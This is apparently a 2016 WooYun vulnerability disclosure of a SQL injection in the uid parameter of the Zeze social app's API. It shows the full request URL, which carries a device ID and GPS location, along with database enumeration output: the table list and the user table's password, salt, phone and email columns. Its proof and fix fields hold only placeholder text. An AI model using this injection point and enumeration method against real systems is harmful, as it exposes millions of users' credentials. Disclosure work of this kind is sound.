当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0208250

漏洞标题:APP安全之啧啧某处设计缺陷可导致400w用户信息泄露

相关厂商:奇客星空

漏洞作者: 小龙

提交时间:2016-05-17 11:29

修复时间:2016-07-01 11:50

公开时间:2016-07-01 11:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-17: 细节已通知厂商并且等待厂商处理中
2016-05-17: 厂商已经确认,细节仅向厂商公开
2016-05-27: 细节向核心白帽子及相关领域专家公开
2016-06-06: 细节向普通白帽子公开
2016-06-16: 细节向实习白帽子公开
2016-07-01: 细节向公众公开

简要描述:

啧啧是一个只属于年轻人的乐园,无论你是95后还是00后,都能在啧啧找到与自己兴趣相投的小伙伴,每天啧一下,开心一整天,同学朋友都在啧。

详细说明:

在APP 啧啧
圈子这里
进去后随便点一条连接

http://api.app.zeze.com/3.0.8/index.php?a=index&area=%E5%9C%A8%E5%8D%8E%E5%8D%97%E7%90%86%E5%B7%A5%E5%A4%A7%E5%AD%A6%E5%8C%97%E5%8C%BA%E9%99%84%E8%BF%91&authcode=MzQ0N2ZiMTljYzc2ZDY5NzQyZTdlOWRiYTA1NTcxMzZhMjA3Y2NlMDRhMDVkOGQ0&brand=QiKU&c=my&city=%E5%B9%BF%E5%B7%9E%E5%B8%82&cpu=mt6753&density=480&deviceid=867556021834224&district=%E5%A4%A9%E6%B2%B3%E5%8C%BA&locale=cn&location=23.168901%2C113.346539&model=8681-A01&page=1&pagesize=15&qikeversion=3.0.8&showuid=2351679&sign=5901506e1fc7424cc6164f98e75bab56&source=qike&street=%E4%B8%9C%E8%8E%9E%E5%BA%84%E8%B7%AF&sysversion=22&uid=4032877&versionCode=308


uid存在注入

1.jpg


2.jpg


3.jpg


4.jpg


back-end DBMS: MySQL 5.0
Database: k7_zeze
+----------------------------------+---------+
| Table                            | Entries |
+----------------------------------+---------+
| dz_forum_post                    | 17264273 |
| dz_forum_memberrecommend         | 12856133 |
| dz_forum_attachment              | 12576677 |
| dz_common_credit_rule_log        | 8215622 |
| dz_forum_groupuser               | 7069174 |
| dz_forum_hotreply_number         | 5698960 |
| dz_common_tagitem                | 4940765 |
| dz_forum_filter_post             | 4740999 |
| dz_forum_postcache               | 4594825 |
| dz_ucenter_memberfields          | 4029779 |
| dz_ucenter_members               | 4029586 |
| dz_common_member_count           | 3983760 |
| dz_common_member_field_forum     | 3983747 |
| dz_common_member_status          | 3983730 |
| dz_common_member                 | 3983506 |
| dz_common_member_profile         | 3976482 |
| dz_common_member_field_home      | 3919048 |
| dz_common_member_newprompt       | 3861881 |
| dz_ucenter_pm_indexes            | 3595761 |
| dz_home_follow                   | 3361753 |
| dz_im_user                       | 3268551 |
| dz_connect_memberbindlog         | 3057564 |
| dz_common_searchindex            | 2812905 |
| dz_home_favorite                 | 2449646 |
| dz_common_member_connect         | 2308114 |
| dz_home_friend_request           | 1935913 |
| dz_forum_attachment_unused       | 1723890 |
| dz_forum_thread                  | 1303294 |
| dz_common_onlinetime             | 1302340 |
| dz_forum_newthread               | 1206249 |
| dz_common_connect_guest          | 1179754 |
| dz_common_member_grouppm         | 1118931 |
| dz_forum_attachment_4            | 1091958 |
| dz_forum_attachment_2            | 1089801 |
| dz_forum_attachment_1            | 1089735 |
| dz_forum_attachment_7            | 1089252 |
| dz_forum_attachment_8            | 1086573 |
| dz_forum_attachment_3            | 1085795 |
| dz_forum_attachment_6            | 1084281 |
| dz_forum_attachment_0            | 1081592 |
| dz_forum_attachment_5            | 1077419 |
| dz_forum_attachment_9            | 1067205 |
| dz_forum_cover                   | 943801  |
| dz_ucenter_pm_members            | 724523  |
| dz_forum_threadmod               | 492493  |
| dz_forum_sofa                    | 487157  |
| dz_thread_feed_halfmonth         | 480610  |
| dz_thread_feed_week              | 480609  |
| dz_forum_polloption_image        | 467189  |
| dz_forum_polloption              | 439481  |
| dz_ucenter_pm_lists              | 402546  |
| dz_ucenter_pm_messages_5         | 362227  |
| dz_ucenter_pm_messages_3         | 348096  |
| dz_ucenter_pm_messages_0         | 348037  |
| dz_ucenter_pm_messages_1         | 343982  |
| dz_ucenter_pm_messages_9         | 341228  |
| dz_ucenter_pm_messages_4         | 335872  |
| dz_ucenter_pm_messages_6         | 335826  |
| dz_ucenter_pm_messages_2         | 335319  |
| dz_ucenter_pm_messages_7         | 334597  |
| dz_ucenter_pm_messages_8         | 324429  |
| dz_mb_school                     | 257420  |
| dz_mobile_wsq_threadlist         | 218009  |
| dz_home_friend                   | 195688  |
| dz_forum_threadimage             | 142655  |
| dz_thread_feed_201508            | 125117  |
| dz_forum_promotion               | 119983  |
| dz_ucenter_newpm                 | 104143  |
| dz_home_friendlog                | 99443   |
| dz_common_report                 | 92184   |
| dz_thread_feed_201507            | 91723   |
| dz_forum_poll                    | 90679   |
| dz_common_member_edit            | 89809   |
| dz_device_token                  | 82585   |
| dz_forum_statlog                 | 82301   |
| dz_forum_threaddisablepos        | 78491   |
| dz_mb_firend                     | 76758   |
| dz_common_credit_log             | 76469   |
| dz_thread_feed_201509            | 59422   |
| dz_mb_common_tagitem             | 56034   |
| dz_tel_code                      | 54461   |
| dz_mb_hot_thread                 | 47249   |
| dz_mb_last_user                  | 47118   |
| dz_mb_device_token               | 46622   |
| dz_common_district               | 45051   |
| dz_security_failedlog            | 44553   |
| dz_mb_taguser                    | 37471   |
| dz_mb_version                    | 37208   |
| dz_thread_feed_201506            | 36530   |
| dz_common_member_goods_buylog    | 36006   |
| dz_thread_feed_201505            | 34042   |
| dz_thread_feed_201504            | 33432   |
| dz_thread_feed_201502            | 32641   |
| dz_forum_threadcalendar          | 31254   |
| dz_common_tag                    | 30487   |
| dz_forum_debatepost              | 29700   |
| dz_thread_feed_201503            | 28465   |
| dz_thread_danmu                  | 26078   |
| dz_security_evilpost             | 23752   |
| dz_forum_debate                  | 23536   |
| dz_common_statuser               | 22702   |
| dz_forum_modwork                 | 19223   |
| dz_thread_feed_201510            | 17913   |
| dz_home_pokearchive              | 17221   |
| dz_common_credit_log_field       | 17081   |
| dz_queue                         | 13884   |
| dz_thread_feed_201501            | 13651   |
| dz_ucenter_members_moezu         | 13071   |
| dz_common_member_moezu           | 13066   |
| dz_common_member_profile_moezu   | 13066   |
| dz_mb_last_user_bak              | 12154   |
| dz_login                         | 12145   |
| dz_forum_threadhot               | 11565   |
| dz_common_feedback               | 11442   |
| dz_report                        | 10932   |
| dz_common_regip                  | 10663   |
| dz_mb_member_profile             | 10220   |
| dz_forum_postlog                 | 8139    |
| dz_security_eviluser             | 7778    |
| dz_common_member_crime           | 7770    |
| dz_forum_postcommentlimit        | 6823    |
| dz_myrepeats                     | 6748    |
| dz_forum_groupfield              | 6504    |
| dz_common_credit_rule_log_field  | 6079    |
| dz_forum_activityapply           | 5863    |
| dz_home_poke                     | 5730    |
| dz_forum_replycredit             | 5650    |
| dz_thread_feed_recent            | 5140    |
| dz_common_member_secwhite        | 4639    |
| dz_forum_poststick               | 3708    |
| dz_thread_feed_201412            | 3696    |
| dz_common_block_pic              | 2854    |
| dz_thread_feed_201411            | 2384    |
| dz_common_seccheck               | 2266    |
| dz_forum_threadlog               | 1859    |
| dz_forum_rsscache                | 1641    |
| dz_thread_feed_201410            | 1594    |
| dz_ucenter_members_chongfu       | 1505    |
| dz_forum_forumfield              | 1177    |
| dz_forum_forum                   | 1176    |
| dz_common_word                   | 1168    |
| dz_thread_danmu_tid              | 881     |
| dz_forum_warning                 | 819     |
| dz_forum_apply                   | 790     |
| dz_common_block_item             | 710     |
| dz_forum_thread_moderate         | 700     |
| dz_common_stat                   | 583     |
| dz_common_setting                | 459     |
| dz_common_setting_new            | 458     |
| dz_common_member_stat_field      | 457     |
| dz_common_stylevar               | 452     |
| dz_ucenter_notelist              | 445     |
| dz_forum_post_moderate           | 442     |
| dz_mb_make_friends               | 441     |
| dz_common_smiley                 | 420     |
| dz_forum_forumfield_copy         | 414     |
| dz_forum_moderator               | 243     |
| dz_common_admincp_perm           | 230     |
| dz_common_syscache               | 224     |
| dz_common_block                  | 219     |
| dz_common_failedip               | 210     |
| dz_common_syscache_new           | 208     |
| dz_mb_reservation                | 173     |
| dz_forum_post_tableid            | 172     |
| dz_common_template_block         | 150     |
| dz_mobile_model                  | 134     |
| dz_forum_threadclass             | 121     |
| dz_common_block_style            | 107     |
| dz_room                          | 101     |
| dz_common_member_temp___         | 100     |
| dz_home_blacklist                | 72      |
| dz_common_pluginvar              | 69      |
| dz_common_member_profile_setting | 51      |
| dz_common_nav                    | 49      |
| dz_mb_top_thread                 | 46      |
| dz_common_goodsitem              | 45      |
| dz_common_grouppm                | 45      |
| dz_common_failedlogin            | 40      |
| dz_common_diy_data               | 39      |
| dz_common_goods                  | 39      |
| dz_common_adminnote              | 34      |
| dz_common_credit_rule            | 34      |
| dz_common_usergroup              | 32      |
| dz_common_usergroup_field        | 32      |
| dz_common_optimizer              | 28      |
| dz_common_banned                 | 27      |
| dz_ucenter_settings              | 27      |
| dz_common_block_item_data        | 25      |
| dz_tel_ip                        | 24      |
| dz_common_admincp_member         | 23      |
| dz_common_admincp_cmenu          | 22      |
| dz_common_plugin                 | 21      |
| dz_common_process                | 21      |
| dz_common_cron                   | 20      |
| dz_mobile_version                | 20      |
| dz_forum_activity                | 19      |
| dz_home_click                    | 15      |
| dz_forum_onlinelist              | 14      |
| dz_common_cache                  | 13      |
| dz_ucenter_vars                  | 13      |
| dz_common_myapp                  | 12      |
| dz_forum_spacecache              | 12      |
| dz_mb_hot_tag                    | 12      |
| dz_mb_masters                    | 12      |
| dz_forum_forumrecommend          | 10      |
| dz_forum_medal                   | 10      |
| dz_common_admingroup             | 9       |
| dz_forum_imagetype               | 9       |
| dz_baidusubmit_setting           | 7       |
| dz_common_admincp_group          | 7       |
| dz_common_admincp_session        | 6       |
| dz_common_style                  | 6       |
| dz_common_template               | 6       |
| dz_common_uin_black              | 6       |
| dz_forum_threadclosed            | 6       |
| dz_forum_typeoption              | 6       |
| dz_forum_bbcode                  | 5       |
| dz_mb_setting                    | 5       |
| dz_ucenter_applications          | 5       |
| dz_common_advertisement          | 4       |
| dz_ucenter_admins                | 4       |
| dz_forum_access                  | 3       |
| dz_forum_grouplevel              | 3       |
| dz_common_word_type              | 2       |
| dz_mobile_setting                | 2       |
| dz_comeing_threadshow            | 1       |
| dz_common_friendlink             | 1       |
| dz_common_secquestion            | 1       |
| dz_forum_threadprofile           | 1       |
| dz_home_show                     | 1       |
| dz_home_userapp                  | 1       |
| dz_home_userappfield             | 1       |
| dz_mb_member                     | 1       |
| dz_portal_topic                  | 1       |
| dz_ucenter_failedlogins          | 1       |
+----------------------------------+---------+


| dz_ucenter_members | 4029586 |
400万用户账号密码,手机号码,邮箱

back-end DBMS: MySQL 5.0
Database: k7_zeze
Table: dz_ucenter_members
[13 columns]
+---------------+-----------------------+
| Column        | Type                  |
+---------------+-----------------------+
| email         | char(32)              |
| lastloginip   | int(10)               |
| lastlogintime | int(10) unsigned      |
| myid          | char(30)              |
| myidkey       | char(16)              |
| password      | char(32)              |
| phone         | char(11)              |
| regdate       | int(10) unsigned      |
| regip         | char(15)              |
| salt          | char(6)               |
| secques       | char(8)               |
| uid           | mediumint(8) unsigned |
| username      | char(15)              |
+---------------+-----------------------+


百度pr6

5.jpg


网站访问量:

6.jpg

漏洞证明:

11

修复方案:

222

版权声明:转载请注明来源 小龙@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-05-17 11:45

厂商回复:

非常感谢白帽子反馈,已通知技术人员修复。

最新状态:

暂无

漏洞评价:

评价

  1. 2016-05-13 23:40 | Freebug ( 普通白帽子 | Rank:110 漏洞数:39 | 流氓是一种高尚的职业!)

    app杀手

  2. 2016-05-14 13:55 | 我叫肥羊 ( 路人 | Rank:27 漏洞数:11 | PHP是最好的语言。。。。。)

    啧啧

  3. 2016-05-17 11:38 | 小白G ( 实习白帽子 | Rank:69 漏洞数:25 | 黑夜给了我黑色的眼睛,而我却用它寻找光明...)

    始终没有雷

  4. 2016-05-17 12:30 | 放逐 ( 路人 | Rank:2 漏洞数:1 | 白帽子放逐Gg?得失乐与悲与Av Qq205655539)

    始终没有雷

  5. 2016-07-01 11:55 | Feei ( 普通白帽子 | Rank:212 漏洞数:36 | 神器已写好,准备刷榜了:)(最近风声紧,...)

    快开门,有你的快递